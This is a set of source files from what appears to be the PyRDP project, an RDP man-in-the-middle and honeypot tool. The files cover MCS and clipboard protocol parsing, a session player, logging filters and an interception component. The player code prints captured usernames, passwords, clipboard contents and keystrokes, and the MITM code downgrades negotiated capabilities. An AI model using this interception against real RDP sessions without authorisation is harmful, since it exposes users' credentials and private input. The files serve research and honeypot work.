        minParams = self.parseDomainParams(stream)
        maxParams = self.parseDomainParams(stream)
        payload = ber.readOctetString(stream)
        return MCSConnectInitialPDU(callingDomain, calledDomain, upward, targetParams, minParams, maxParams, payload)

    def parseConnectResponse(self, stream: BytesIO) -> MCSConnectResponsePDU:
        """
        Parse a Connect Response PDU
        :param stream: stream containing the data
        """
        _length = ber.readLength(stream)
        result = ber.readEnumeration(stream)
        calledConnectID = ber.readInteger(stream)
        domainParams = self.parseDomainParams(stream)
        payload = ber.readOctetString(stream)
        return MCSConnectResponsePDU(result, calledConnectID, domainParams, payload)

    def parseErectDomainRequest(self, stream: BytesIO) -> MCSErectDomainRequestPDU:
        """
        Parse an Erect Domain Request PDU
        :param stream: stream containing the data
        """
        subHeight = 1
        subInterval = 1

        try:
            # Windows generally does not seem to care about invalid erect domain requests, so use default values if
            # parsing fails.
            subHeight = per.readInteger(stream)
            subInterval = per.readInteger(stream)
        except ValueError:
            pass

        payload = stream.read()
        return MCSErectDomainRequestPDU(subHeight, subInterval, payload)

    def parseDisconnectProviderUltimatum(self, stream: BytesIO) -> MCSDisconnectProviderUltimatumPDU:
        """
        Parse a Disconnect Provider Ultimatum PDU
        :param stream: stream containing the data
        """
        reason = per.readEnumeration(stream)

        if len(stream.read()) > 0:
            raise ParsingError("Unexpected payload")

        return MCSDisconnectProviderUltimatumPDU(reason)

    def parseAttachUserRequest(self, stream: BytesIO) -> MCSAttachUserRequestPDU:
        """
        Parse an Attach User Request PDU
        :param stream: stream containing the data
        """
        if len(stream.read()) > 0:
            raise ParsingError("Unexpected payload")

        return MCSAttachUserRequestPDU()

    def parseAttachUserConfirm(self, stream: BytesIO) -> MCSAttachUserConfirmPDU:
        """
        Parse an Attach User Confirm PDU
        :param stream: stream containing the data
        """
        result = per.readEnumeration(stream)
        data = stream.read()

        initiator = None
        if len(data) == 2:
            initiator = Uint16BE.unpack(data) + MCSChannelID.USERCHANNEL_BASE
        elif len(data) > 2:
            raise ParsingError("Unexpected payload")

        return MCSAttachUserConfirmPDU(result, initiator)

    def parseChannelJoinRequest(self, stream: BytesIO) -> MCSChannelJoinRequestPDU:
        """
        Parse a Channel Join Request PDU
        :param stream: stream containing the data
        """
        data = stream.read()
        if len(data) < 4:
            raise ParsingError("Invalid Channel Join Request PDU received")

        initiator = Uint16BE.unpack(data[0 : 2]) + MCSChannelID.USERCHANNEL_BASE
        channelID = Uint16BE.unpack(data[2 : 4])
        payload = data[4 :]

        return MCSChannelJoinRequestPDU(initiator, channelID, payload)

    def parseChannelJoinConfirm(self, stream: BytesIO) -> MCSChannelJoinConfirmPDU:
        """
        Parse a Channel Join Confirm PDU
        :param stream: stream containing the data
        """
        result = per.readEnumeration(stream)
        data = stream.read()

        if len(data) < 4 or len(data) == 5:
            raise ParsingError("Invalid Channel Join Confirm PDU received")
        elif len(data) >= 6:
            channelID = Uint16BE.unpack(data[4 : 6])
            payload = data[6 :]
        else:
            channelID = None
            payload = b""

        initiator = Uint16BE.unpack(data[0 : 2]) + MCSChannelID.USERCHANNEL_BASE
        requested = Uint16BE.unpack(data[2 : 4])
        return MCSChannelJoinConfirmPDU(result, initiator, requested, channelID, payload)

    def parseDataPDU(self, stream: BytesIO, PDUClass: type) -> Union[MCSSendDataRequestPDU, MCSSendDataIndicationPDU]:
        """
        Common logic for parsing Send Data Request and Send Data Indication PDUs
        :param stream: stream containing the data
        :param PDUClass: the actual PDU class: MCSSendDataRequestPDU or MCSSendDataIndicationPDU
        """
        initiator = Uint16BE.unpack(stream.read(2)) + MCSChannelID.USERCHANNEL_BASE
        channelID = Uint16BE.unpack(stream.read(2))
        priority = per.readEnumeration(stream)
        payload = per.readOctetStream(stream)
        return PDUClass(initiator, channelID, priority, payload)

    def parseSendDataRequest(self, stream: BytesIO) -> MCSSendDataRequestPDU:
        """
        Parse a Send Data Request PDU
        :param stream: stream containing the data
        """
        return self.parseDataPDU(stream, MCSSendDataRequestPDU)

    def parseSendDataIndication(self, stream: BytesIO) -> MCSSendDataIndicationPDU:
        """
        Parse a Send Data Indication PDU
        :param stream: stream containing the data
        """
        return self.parseDataPDU(stream, MCSSendDataIndicationPDU)

    def write(self, pdu: MCSPDU) -> bytes:
        """
        Encode an MCS PDU into raw bytes
        :param pdu: the MCSPDU to encode
        :return: The raw bytes to send
        """
        if pdu.header not in self.writers:
            raise UnknownPDUTypeError("Trying to write unknown MCS PDU type %s" % pdu.header, pdu.header)

        stream = BytesIO()

        if pdu.header in [MCSPDUType.CONNECT_INITIAL, MCSPDUType.CONNECT_RESPONSE]:
            stream.write(Uint8.pack(ber.Class.BER_CLASS_APPL | ber.PC.BER_CONSTRUCT | ber.Tag.BER_TAG_MASK))
            stream.write(Uint8.pack(pdu.header))
        else:
            stream.write(Uint8.pack((pdu.header << 2) | self.headerOptions[pdu.header]))

        self.writers[pdu.header](stream, pdu)
        return stream.getvalue()

    def writeDomainParams(self, stream: BytesIO, params: MCSDomainParams):
        """
        Encode a Domain Params structure into the provided stream
        :param stream: The destination stream to write into.
        :param params: the domain params to encode.
        """
        substream = BytesIO()
        substream.write(ber.writeInteger(params.maxChannelIDs))
        substream.write(ber.writeInteger(params.maxUserIDs))
        substream.write(ber.writeInteger(params.maxTokenIDs))
        substream.write(ber.writeInteger(params.numPriorities))
        substream.write(ber.writeInteger(params.minThroughput))
        substream.write(ber.writeInteger(params.maxHeight))
        substream.write(ber.writeInteger(params.maxMCSPDUSize))
        substream.write(ber.writeInteger(params.protocolVersion))

        substream = substream.getvalue()
        stream.write(ber.writeUniversalTag(ber.Tag.BER_TAG_SEQUENCE, True))
        stream.write(ber.writeLength(len(substream)))
        stream.write(substream)

    def writeConnectInitial(self, stream: BytesIO, pdu: MCSConnectInitialPDU):
        """
        Encode a Connect Initial PDU
        :param stream: The destination stream to write into.
        :param pdu: the PDU to encode.
        """
        substream = BytesIO()
        substream.write(ber.writeOctetString(pdu.callingDomain))
        substream.write(ber.writeOctetString(pdu.calledDomain))
        substream.write(ber.writeBoolean(pdu.upward))
        self.writeDomainParams(substream, pdu.targetParams)
        self.writeDomainParams(substream, pdu.minParams)
        self.writeDomainParams(substream, pdu.maxParams)
        substream.write(ber.writeOctetString(pdu.payload))

        data = substream.getvalue()
        stream.write(ber.writeLength(len(data)))
        stream.write(data)

    def writeConnectResponse(self, stream: BytesIO, pdu: MCSConnectResponsePDU):
        """
        Encode a Connect Response PDU
        :param stream: The destination stream to write into.
        :param pdu: the PDU to encode.
        """
        substream = BytesIO()
        substream.write(ber.writeEnumeration(pdu.result))
        substream.write(ber.writeInteger(pdu.calledConnectID))
        self.writeDomainParams(substream, pdu.domainParams)
        substream.write(ber.writeOctetString(pdu.payload))
        allData = substream.getvalue()
        stream.write(ber.writeLength(len(allData)))
        stream.write(allData)

    def writeErectDomainRequest(self, stream: BytesIO, pdu: MCSErectDomainRequestPDU):
        """
        Encode a Erect Domain Request PDU
        :param stream: The destination stream to write into.
        :param pdu: the PDU to encode.
        """
        stream.write(per.writeInteger(pdu.subHeight))
        stream.write(per.writeInteger(pdu.subInterval))
        stream.write(pdu.payload)

    def writeDisconnectProviderUltimatum(self, stream: BytesIO, pdu: MCSDisconnectProviderUltimatumPDU):
        """
        Encode a Disconnect Provider Ultimatum PDU
        :param stream: The destination stream to write into.
        :param pdu: the PDU to encode.
        """
        stream.write(per.writeEnumeration(pdu.reason))

    def writeAttachUserRequest(self, stream, pdu):
        """
        Does nothing :)
        """
        pass

    def writeAttachUserConfirm(self, stream: BytesIO, pdu: MCSAttachUserConfirmPDU):
        """
        Encode a Attach User Confirm PDU
        :param stream: The destination stream to write into.
        :param pdu: the PDU to encode.
        """
        stream.write(per.writeEnumeration(pdu.result))

        if pdu.initiator is not None:
            stream.write(Uint16BE.pack(pdu.initiator - MCSChannelID.USERCHANNEL_BASE))

    def writeChannelJoinRequest(self, stream: BytesIO, pdu: MCSChannelJoinRequestPDU):
        """
        Encode a Channel Join Request PDU
        :param stream: The destination stream to write into.
        :param pdu: the PDU to encode.
        """
        stream.write(Uint16BE.pack(pdu.initiator - MCSChannelID.USERCHANNEL_BASE))
        stream.write(Uint16BE.pack(pdu.channelID))
        stream.write(pdu.payload)

    def writeChannelJoinConfirm(self, stream: BytesIO, pdu: MCSChannelJoinConfirmPDU):
        """
        Encode a Channel Join Confirm PDU
        :param stream: The destination stream to write into.
        :param pdu: the confirmation PDU.
        """
        stream.write(per.writeEnumeration(pdu.result))
        stream.write(Uint16BE.pack(pdu.initiator - MCSChannelID.USERCHANNEL_BASE))
        stream.write(Uint16BE.pack(pdu.requested))

        if pdu.channelID is not None:
            stream.write(Uint16BE.pack(pdu.channelID))
            stream.write(pdu.payload)

    def writeDataPDU(self, stream: BytesIO, pdu: Union[MCSSendDataRequestPDU, MCSSendDataIndicationPDU]):
        """
        Encode a Data PDU
        :param stream: The destination stream to write into.
        :param pdu: the PDU to encode.
        """
        stream.write(Uint16BE.pack(pdu.initiator - MCSChannelID.USERCHANNEL_BASE))
        stream.write(Uint16BE.pack(pdu.channelID))
        stream.write(per.writeEnumeration(pdu.priority))
        stream.write(per.writeOctetStream(pdu.payload))

    def writeSendDataRequest(self, stream: BytesIO, pdu: MCSSendDataRequestPDU):
        """
        Encode a Send Data Request PDU
        :param stream: The destination stream to write into.
        :param pdu: the PDU to encode.
        """
        self.writeDataPDU(stream, pdu)

    def writeSendDataIndication(self, stream: BytesIO, pdu: MCSSendDataIndicationPDU):
        """
        Encode a Send Data Indication PDU
        :param stream: The destination stream to write into.
        :param pdu: the PDU to encode.
        """
        self.writeDataPDU(stream, pdu)



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#


class PDU:
    """
    Base class to represent a Protocol Data Unit (PDU).
    If a PDU does not have a payload, simply set it to None.
    """
    REPR_PAYLOAD_CUTOFF_LENGTH = 200

    def __init__(self, payload: bytes = b""):
        """
        :param payload: The PDU's payload data
        """
        self.payload = payload

    def __repr__(self) -> str:
        properties = dict(self.__dict__)

        if len(self.payload) > PDU.REPR_PAYLOAD_CUTOFF_LENGTH:
            properties["payload"] = properties["payload"][: PDU.REPR_PAYLOAD_CUTOFF_LENGTH] + b"<LONG PAYLOAD>"

        representation = self.__class__.__name__ + str(properties)
        return representation


#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2020 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from typing import Dict

from pyrdp.enum import ClipboardMessageType, ClipboardMessageFlags, ClipboardFormatNumber
from pyrdp.pdu.pdu import PDU


class FormatName(PDU):
    def __init__(self, formatId: int, formatName: bytes):
        super().__init__()
        self.formatId = formatId
        self.formatName = formatName

    def __str__(self):
        return self.formatName.decode('utf-16le').strip('\x00')


class ShortFormatName(FormatName):
    """
    https://msdn.microsoft.com/en-us/library/cc241107.aspx
    """


class LongFormatName(FormatName):
    """
    https://msdn.microsoft.com/en-us/library/cc241109.aspx
    """


class ClipboardPDU(PDU):
    """
    Not a PDU, just a base class for every other clipboard PDUs.
    https://msdn.microsoft.com/en-us/library/cc241097.aspx
    """

    def __init__(self, msgType: ClipboardMessageType, msgFlags: ClipboardMessageFlags, payload: bytes = b""):
        PDU.__init__(self, payload)
        self.msgType = msgType
        self.msgFlags = msgFlags


class FormatDataRequestPDU(ClipboardPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241122.aspx
    """

    def __init__(self, requestedFormatId: ClipboardFormatNumber):
        ClipboardPDU.__init__(self, ClipboardMessageType.CB_FORMAT_DATA_REQUEST, ClipboardMessageFlags.NONE)
        self.requestedFormatId = requestedFormatId


class FormatDataResponsePDU(ClipboardPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241123.aspx
    """

    def __init__(self, requestedFormatData: bytes, isSuccessful: bool = True, formatId = None):

        flags = ClipboardMessageFlags.CB_RESPONSE_OK if isSuccessful else ClipboardMessageFlags.CB_RESPONSE_FAIL
        ClipboardPDU.__init__(self, ClipboardMessageType.CB_FORMAT_DATA_RESPONSE, flags)
        self.requestedFormatData = requestedFormatData
        self.formatId = formatId
        self.files = []


class ServerMonitorReadyPDU(ClipboardPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241102.aspx
    """

    def __init__(self):
        ClipboardPDU.__init__(self, ClipboardMessageType.CB_MONITOR_READY, ClipboardMessageFlags.NONE)


class FormatListPDU(ClipboardPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241105.aspx
    """

    def __init__(self, formatList: Dict[int, LongFormatName], msgFlags: ClipboardMessageFlags = ClipboardMessageFlags.NONE):
        ClipboardPDU.__init__(self, ClipboardMessageType.CB_FORMAT_LIST, msgFlags)
        self.formatList = formatList


class FormatListResponsePDU(ClipboardPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc241120.aspx
    """

    def __init__(self, isSuccessful: bool = True):
        flags = ClipboardMessageFlags.CB_RESPONSE_OK if isSuccessful else ClipboardMessageFlags.CB_RESPONSE_FAIL
        ClipboardPDU.__init__(self, ClipboardMessageType.CB_FORMAT_LIST_RESPONSE, flags)


class FileContentsRequestPDU(ClipboardPDU):
    def __init__(self, payload: bytes, streamId: int, lindex: int, msgFlags: int, flags: int, pos: int, size: int, clipId: int):
        ClipboardPDU.__init__(self, ClipboardMessageType.CB_FILECONTENTS_REQUEST, msgFlags)
        self.payload = payload
        self.streamId = streamId
        self.lindex = lindex
        self.flags = flags
        self.offset = pos
        self.size = size
        self.clipId = clipId


class FileContentsResponsePDU(ClipboardPDU):
    def __init__(self, payload: bytes, msgFlags: int, streamId: int, data: bytes):
        ClipboardPDU.__init__(self, ClipboardMessageType.CB_FILECONTENTS_RESPONSE, msgFlags)
        self.payload = payload
        self.data = data
        self.streamId = streamId



#
# This file is part of the PyRDP project.
# Copyright (C) 2020 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
from typing import Optional, Tuple
from pyrdp.core import decodeUTF16LE, Observer
from pyrdp.enum import PlayerPDUType, CapabilityType, ParserMode, \
    FastPathFragmentation, \
    KeyboardFlag, PointerFlag, scancode, DeviceType
from pyrdp.pdu import ConfirmActivePDU, UpdatePDU, InputPDU, \
    FastPathOutputEvent, FastPathUnicodeEvent, FastPathScanCodeEvent, \
    FastPathMouseEvent, KeyboardEvent, MouseEvent, \
    PlayerPDU, PlayerDeviceMappingPDU, \
    FormatDataResponsePDU
from pyrdp.parser import ClientConnectionParser, ClientInfoParser, ClipboardParser, \
    SlowPathParser, BasicFastPathParser


class BaseEventHandler(Observer):
    """
    Base implementation for player event processing.
    """

    def __init__(self):
        super().__init__()

        # Input processing state.
        self.shiftPressed = False
        self.capsLockOn = False
        self.buffer = b""

        # Base level handlers.
        self.handlers = {
            PlayerPDUType.CLIENT_DATA: self.onClientData,
            PlayerPDUType.CLIENT_INFO: self.onClientInfo,
            PlayerPDUType.CONNECTION_CLOSE: self.onConnectionClose,
            PlayerPDUType.CLIPBOARD_DATA: self.onClipboardData,
            PlayerPDUType.SLOW_PATH_PDU: self.onSlowPathPDU,
            PlayerPDUType.FAST_PATH_OUTPUT: self.onFastPathFragment,
            PlayerPDUType.FAST_PATH_INPUT: self.onFastPathInput,
            PlayerPDUType.DEVICE_MAPPING: self.onDeviceMapping,
        }

    def writeText(self, text: str):
        pass

    def writeSeparator(self):
        pass

    def onCapabilities(self, caps: dict):
        """Handle capability set reported by the server."""
        bmp = caps[CapabilityType.CAPSTYPE_BITMAP]
        (w, h) = (bmp.desktopWidth, bmp.desktopHeight)
        self.writeText(f'<Resolution: {w}x{h}>')

    def cleanup(self):
        """
        Called when this handler is no longer needed.

        This callback can be used to perform any handler specific
        cleanup that is necessary after a data stream is done processing.

        For playback streams, this means that the replay file is over and will
        no longer be played back. (Essentially, the tab has been closed.)

        For live streams, this means that the connection has been terminated.
        """
        pass

    def onPDUReceived(self, pdu: PlayerPDU):
        if pdu.header in self.handlers:
            self.handlers[pdu.header](pdu)

    def onClientData(self, pdu: PlayerPDU):
        """
        Prints the clientName on the screen
        """
        parser = ClientConnectionParser()
        clientDataPDU = parser.parse(pdu.payload)
        clientName = clientDataPDU.coreData.clientName.strip("\x00")

        self.writeSeparator()
        self.writeText(f"HOST: {clientName}\n")
        self.writeSeparator()

    def onClientInfo(self, pdu: PlayerPDU):
        parser = ClientInfoParser()
        clientInfoPDU = parser.parse(pdu.payload)

        self.writeSeparator()

        self.writeText("USERNAME: {}\nPASSWORD: {}\nDOMAIN: {}\n".format(
            clientInfoPDU.username.replace("\x00", ""),
            clientInfoPDU.password.replace("\x00", ""),
            clientInfoPDU.domain.replace("\x00", "")
        ))

        self.writeSeparator()

    def onConnectionClose(self, _: PlayerPDU):
        self.writeText("\n<Connection closed>")

    def onClipboardData(self, pdu: PlayerPDU):
        parser = ClipboardParser()
        pdu = parser.parse(pdu.payload)

        if not isinstance(pdu, FormatDataResponsePDU):
            return

        clipboardData = decodeUTF16LE(pdu.requestedFormatData)

        self.writeSeparator()
        self.writeText(f"CLIPBOARD DATA: {clipboardData}")
        self.writeSeparator()

    def onSlowPathPDU(self, pdu: PlayerPDU):
        parser = SlowPathParser()
        pdu = parser.parse(pdu.payload)

        if isinstance(pdu, ConfirmActivePDU):
            self.onCapabilities(pdu.parsedCapabilitySets)

        elif isinstance(pdu, UpdatePDU):
            self.onSlowPathUpdate(pdu)

        elif isinstance(pdu, InputPDU):
            for event in pdu.events:
                if isinstance(event, MouseEvent):
                    self.onMousePosition(event.x, event.y)
                elif isinstance(event, KeyboardEvent):
                    self.onScanCode(event.keyCode,
                                    event.flags & KeyboardFlag.KBDFLAGS_DOWN == 0,
                                    event.flags & KeyboardFlag.KBDFLAGS_EXTENDED != 0)

    def onFastPathFragment(self, pdu: PlayerPDU):
        parser = BasicFastPathParser(ParserMode.CLIENT)
        pdu = parser.parse(pdu.payload)

        for event in pdu.events:
            reassembledEvent = self.reassembleEvent(event)

            if reassembledEvent is not None:
                self.onFastPathOutput(reassembledEvent)

    def onFastPathOutput(self, event: FastPathOutputEvent):
        pass

    def onFastPathInput(self, pdu: PlayerPDU):
        parser = BasicFastPathParser(ParserMode.SERVER)
        pdu = parser.parse(pdu.payload)

        for event in pdu.events:
            if isinstance(event, FastPathUnicodeEvent):
                if not event.released:
                    self.onUnicode(event)
            elif isinstance(event, FastPathMouseEvent):
                self.onMouse(event)
            elif isinstance(event, FastPathScanCodeEvent):
                self.onScanCode(event.scanCode, event.isReleased,
                                event.rawHeaderByte & scancode.KBDFLAGS_EXTENDED != 0)

    def onSlowPathUpdate(self, pdu: UpdatePDU):
        pass

    def onUnicode(self, event: FastPathUnicodeEvent):
        self.writeText(str(event.text))

    def onMouse(self, event: FastPathMouseEvent):
        self.onMousePosition(event.mouseX, event.mouseY)

        if event.pointerFlags & PointerFlag.PTRFLAGS_DOWN:
            self.onMouseButton({
                1: event.pointerFlags & PointerFlag.PTRFLAGS_BUTTON1,
                2: event.pointerFlags & PointerFlag.PTRFLAGS_BUTTON2,
                3: event.pointerFlags & PointerFlag.PTRFLAGS_BUTTON3
            }, (event.mouseX, event.mouseY))

    def onMouseButton(self, buttons: dict, pos: Tuple[int, int]):
        """
        Called when mouse buttons have been pressed.

        :param buttons: A dictionary containing the state of MOUSE[1], MOUSE[2], MOUSE[3].
        :param pos: The (x,y) coordinates of the button press.

        The state is True if the button is pressed, False otherwise.
        """
        pass

    def onMousePosition(self, x: int, y: int):
        pass

    def onScanCode(self, scanCode: int, isReleased: bool, isExtended: bool):
        """
        Handle scan code.
        """
        # This should probably be refactored so that the base layer does less
        # processing and lets more specific layers handle the keystrokes the way
        # they need.
        keyName = scancode.getKeyName(scanCode, isExtended, self.shiftPressed, self.capsLockOn)

        if len(keyName) == 1:
            if not isReleased:
                self.writeText(keyName)
        else:
            self.writeText(f"\n<{keyName} {'released' if isReleased else 'pressed'}>")

        # Left or right shift
        if scanCode in [0x2A, 0x36]:
            self.shiftPressed = not isReleased

        # Caps lock
        elif scanCode == 0x3A and not isReleased:
            self.capsLockOn = not self.capsLockOn

    def onDeviceMapping(self, pdu: PlayerDeviceMappingPDU):
        self.writeText(f"\n<{DeviceType.getPrettyName(pdu.deviceType)} mapped: {pdu.name}>")

    def reassembleEvent(self, event: FastPathOutputEvent) -> Optional[FastPathOutputEvent]:
        """
        Handles FastPath event reassembly as described in
        https://msdn.microsoft.com/en-us/library/cc240622.aspx
        :param event: A potentially segmented fastpath output event
        :return: a FastPathBitmapEvent if a complete PDU has been reassembled, otherwise None. If the event is not
        fragmented, it is returned as is.
        """
        fragmentationFlag = FastPathFragmentation((event.header & 0b00110000) >> 4)

        if fragmentationFlag == FastPathFragmentation.FASTPATH_FRAGMENT_SINGLE:
            return event
        elif fragmentationFlag == FastPathFragmentation.FASTPATH_FRAGMENT_FIRST:
            self.buffer = event.payload
        elif fragmentationFlag == FastPathFragmentation.FASTPATH_FRAGMENT_NEXT:
            self.buffer += event.payload
        elif fragmentationFlag == FastPathFragmentation.FASTPATH_FRAGMENT_LAST:
            self.buffer += event.payload
            event.payload = self.buffer
            return event

        return None



#
# This file is part of the PyRDP project.
# Copyright (C) 2020 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.core import settings

from pathlib import Path


"""
The default configuration for the Player.
"""
DEFAULTS =  settings.load(Path(__file__).parent.absolute() / "player.default.ini")



#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2022 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
# flake8: noqa

from pyrdp.enum.core import ParserMode
from pyrdp.enum.gcc import GCCPDUType
from pyrdp.enum.mcs import MCSChannelID, MCSChannelName, MCSPDUType, MCSResult
from pyrdp.enum.negotiation import NegotiationRequestFlags, NegotiationType
from pyrdp.enum.ntlmssp import NTLMSSPMessageType, NTLMSSPChallengeType, NTLMSSPChallengeVersion
from pyrdp.enum.player import MouseButton, PlayerPDUType
from pyrdp.enum.rdp import *
from pyrdp.enum.orders import DrawingOrderControlFlags
from pyrdp.enum.scancode import ScanCode, ScanCodeTuple
from pyrdp.enum.segmentation import SegmentationPDUType
from pyrdp.enum.virtual_channel.clipboard import ClipboardFormatName, ClipboardFormatNumber, ClipboardMessageFlags, \
    ClipboardMessageType, FileContentsFlags
from pyrdp.enum.virtual_channel.device_redirection import CreateOption, DeviceRedirectionComponent, \
    DeviceRedirectionPacketID, DeviceType, DirectoryAccessMask, FileAccessMask, FileAttributes, \
    FileCreateDisposition, FileCreateOptions, FileShareAccess, FileSystemInformationClass, GeneralCapabilityVersion, \
    MajorFunction, MinorFunction, RDPDRCapabilityType
from pyrdp.enum.virtual_channel.virtual_channel import VirtualChannelPDUFlag
from pyrdp.enum.windows import NTSTATUS, NtStatusSeverity
from pyrdp.enum.x224 import X224PDUType



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from logging import Filter, LogRecord


class LoggerNameFilter(Filter):
    """
    Filter object that filters on logger names and supports wildcards (*).
    """

    def __init__(self, name: str):
        super().__init__(name)

    def filter(self, record: LogRecord):
        if self.name == "":
            return True

        filterParts = self.name.split(".")
        loggerParts = record.name.split(".")

        if len(filterParts) > len(loggerParts):
            return False

        for index in range(len(filterParts)):
            filterPart = filterParts[index]
            logPart = loggerParts[index]

            if filterPart != logPart and filterPart != "*":
                return False

        return True


class SensorFilter(Filter):
    """
    Filter that adds the sensor id to the logrecord's arguments.
    """

    def __init__(self, sensorID):
        super().__init__()
        self.sensorID = sensorID

    def filter(self, record: LogRecord) -> bool:
        if record.args == ():
            record.args = {}
        elif isinstance(record.args, dict):
            record.args.update({"sensor": self.sensorID})

        return True


class ConnectionMetadataFilter(Filter):
    """
    Filter that adds arguments to the record regarding the
    active session (such as source IP, port and sessionId)
    """

    def __init__(self, server, sessionId: str):
        super().__init__()
        self.server = server
        self.sessionId = sessionId

    def filter(self, record: LogRecord) -> bool:
        if isinstance(record.args, tuple):
            record.args = {}

        clientInfo = self.server.tcp.transport.client
        record.args.update({
            "src_ip": clientInfo[0],
            "src_port": clientInfo[1],
            "session": self.sessionId
        })

        return True


#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.enum import SegmentationPDUType
from pyrdp.pdu.pdu import PDU
from pyrdp.pdu.segmentation import SegmentationPDU


class TPKTPDU(SegmentationPDU):

    def __init__(self, payload: bytes):
        PDU.__init__(self, payload)
        self.header = 3

    def getSegmentationType(self) -> SegmentationPDUType:
        return SegmentationPDUType.TPKT


#
# This file is part of the PyRDP project.
# Copyright (C) 2019-2020 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
from logging import LoggerAdapter

from pyrdp.enum import CapabilityType, KeyboardFlag, OrderFlag, VirtualChannelCompressionFlag, Order
from pyrdp.layer import SlowPathLayer, SlowPathObserver
from pyrdp.logging.StatCounter import StatCounter, STAT
from pyrdp.mitm.state import RDPMITMState
from pyrdp.pdu import Capability, ConfirmActivePDU, DemandActivePDU, InputPDU, KeyboardEvent, SlowPathPDU, MouseEvent
from pyrdp.mitm.BasePathMITM import BasePathMITM


class SlowPathMITM(BasePathMITM):
    """
    MITM component for the slow-path layer.
    """

    def __init__(self, client: SlowPathLayer, server: SlowPathLayer, state: RDPMITMState, statCounter: StatCounter, log: LoggerAdapter):
        """
        :param client: slow-path layer for the client side
        :param server: slow-path layer for the server side
        """
        super().__init__(state, client, server, statCounter, log)

        self.clientObserver = self.client.createObserver(
            onPDUReceived=self.onClientPDUReceived,
            onConfirmActive=self.onConfirmActive
        )

        self.serverObserver = self.server.createObserver(
            onPDUReceived=self.onServerPDUReceived,
            onDemandActive=self.onDemandActive,
        )

    def onClientPDUReceived(self, pdu: SlowPathPDU):
        self.statCounter.increment(STAT.IO_INPUT_SLOWPATH)
        SlowPathObserver.onPDUReceived(self.clientObserver, pdu)

        if self.state.forwardInput:
            self.server.sendPDU(pdu)

        if not self.state.loggedIn:
            if isinstance(pdu, InputPDU):
                for event in pdu.events:
                    if isinstance(event, KeyboardEvent):
                        self.onScanCode(event.keyCode, event.flags & KeyboardFlag.KBDFLAGS_DOWN == 0,
                                        event.flags & KeyboardFlag.KBDFLAGS_EXTENDED != 0)
                    elif isinstance(event, MouseEvent):
                        self.onMouse(event.x, event.y, event.flags)

    def onServerPDUReceived(self, pdu: SlowPathPDU):
        self.statCounter.increment(STAT.IO_OUTPUT_SLOWPATH)
        SlowPathObserver.onPDUReceived(self.serverObserver, pdu)

        if self.state.forwardOutput:
            self.client.sendPDU(pdu)

    def onConfirmActive(self, pdu: ConfirmActivePDU):
        """
        Disable drawing orders and other unimplemented features.
        :param pdu: the confirm active PDU
        """

        if self.state.config.downgrade:

            # Disable surface commands
            if CapabilityType.CAPSETTYPE_SURFACE_COMMANDS in pdu.parsedCapabilitySets:
                pdu.parsedCapabilitySets[CapabilityType.CAPSETTYPE_SURFACE_COMMANDS].cmdFlags = 0

            # Disable GDI if not explicitly requested.
            if not self.state.config.useGdi:
                # Force RDP server to send bitmap events instead of order events.
                pdu.parsedCapabilitySets[CapabilityType.CAPSTYPE_ORDER].orderFlags = \
                    OrderFlag.NEGOTIATEORDERSUPPORT | OrderFlag.ZEROBOUNDSDELTASSUPPORT
                pdu.parsedCapabilitySets[CapabilityType.CAPSTYPE_ORDER].orderSupport = b"\x00" * 32

                # Override the bitmap cache capability set with null values.
                if CapabilityType.CAPSTYPE_BITMAPCACHE in pdu.parsedCapabilitySets:
                    pdu.parsedCapabilitySets[CapabilityType.CAPSTYPE_BITMAPCACHE] = Capability(
                        CapabilityType.CAPSTYPE_BITMAPCACHE, b"\x00" * 36)
            else:
                # Disable NineGrid support (Not implemented in Player)
                if CapabilityType.CAPSTYPE_ORDER in pdu.parsedCapabilitySets:
                    orders = pdu.parsedCapabilitySets[CapabilityType.CAPSTYPE_ORDER]
                    supported = bytearray(orders.orderSupport)
                    supported[Order.TS_NEG_DRAWNINEGRID_INDEX] = 0
                    orders.orderSupport = supported

                if CapabilityType.CAPSTYPE_DRAWNINEGRIDCACHE in pdu.parsedCapabilitySets:
                    pdu.parsedCapabilitySets[CapabilityType.CAPSTYPE_DRAWNINEGRIDCACHE].rawData = b"\x00"*8

        # Disable virtual channel compression
        if CapabilityType.CAPSTYPE_VIRTUALCHANNEL in pdu.parsedCapabilitySets:
            pdu.parsedCapabilitySets[CapabilityType.CAPSTYPE_VIRTUALCHANNEL].flags = \
                VirtualChannelCompressionFlag.VCCAPS_NO_COMPR

    def onDemandActive(self, pdu: DemandActivePDU):
        """
        Disable virtual channel compression.
        :param pdu: the demand active PDU
        """

        if CapabilityType.CAPSTYPE_ORDER in pdu.parsedCapabilitySets:
            orders = pdu.parsedCapabilitySets[CapabilityType.CAPSTYPE_ORDER]
            supported = bytearray(orders.orderSupport)
            supported[Order.TS_NEG_DRAWNINEGRID_INDEX] = 0
            orders.orderSupport = supported

        if CapabilityType.CAPSTYPE_VIRTUALCHANNEL in pdu.parsedCapabilitySets:
            pdu.parsedCapabilitySets[CapabilityType.CAPSTYPE_VIRTUALCHANNEL].flags = \
                VirtualChannelCompressionFlag.VCCAPS_NO_COMPR



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from enum import IntEnum

from pyrdp.exceptions import CrypterUnavailableError
from pyrdp.security.settings import SecuritySettings, SecuritySettingsObserver


class RC4CrypterProxy(SecuritySettingsObserver):
    """
    SecuritySettingsObserver that can be used like an RC4Crypter once the crypter has been generated.
    """

    class Mode(IntEnum):
        """
        RC4CrypterProxy mode (client or server).
        """
        CLIENT = 0
        SERVER = 1

    def __init__(self, mode: 'RC4CrypterProxy.Mode'):
        SecuritySettingsObserver.__init__(self)
        self.mode = mode
